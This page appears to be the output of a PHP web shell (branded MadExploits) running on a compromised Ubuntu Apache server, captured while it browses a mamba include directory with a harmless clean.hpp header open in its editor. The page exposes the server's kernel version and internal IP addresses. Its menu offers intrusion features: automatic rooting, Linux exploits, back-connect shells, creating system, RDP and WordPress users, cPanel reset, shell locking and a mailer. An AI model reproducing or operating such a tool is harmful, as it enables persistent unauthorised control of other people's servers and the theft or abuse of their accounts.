Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
miniconda3 /
python /
include /
mamba /
api /
[ HOME SHELL ]
Name
Size
Permission
Action
c_api.h
1.25
KB
-rw-rw-r--
channel_loader.hpp
235
B
-rw-rw-r--
clean.hpp
668
B
-rw-rw-r--
config.hpp
458
B
-rw-rw-r--
configuration.hpp
29.39
KB
-rw-rw-r--
configuration_impl.hpp
9.01
KB
-rw-rw-r--
constants.hpp
817
B
-rw-rw-r--
create.hpp
611
B
-rw-rw-r--
info.hpp
559
B
-rw-rw-r--
install.hpp
3.1
KB
-rw-rw-r--
list.hpp
649
B
-rw-rw-r--
remove.hpp
674
B
-rw-rw-r--
repoquery.hpp
426
B
-rw-rw-r--
shell.hpp
875
B
-rw-rw-r--
update.hpp
478
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clean.hpp
// Copyright (c) 2019, QuantStack and Mamba Contributors // // Distributed under the terms of the BSD 3-Clause License. // // The full license is in the file LICENSE, distributed with this software. #ifndef MAMBA_API_CLEAN_HPP #define MAMBA_API_CLEAN_HPP namespace mamba { const int MAMBA_CLEAN_ALL = 1 << 0; const int MAMBA_CLEAN_INDEX = 1 << 1; const int MAMBA_CLEAN_PKGS = 1 << 2; const int MAMBA_CLEAN_TARBALLS = 1 << 3; const int MAMBA_CLEAN_LOCKS = 1 << 4; const int MAMBA_CLEAN_TRASH = 1 << 5; const int MAMBA_CLEAN_FORCE_PKGS_DIRS = 1 << 6; class Configuration; void clean(Configuration& config, int options); } #endif
Close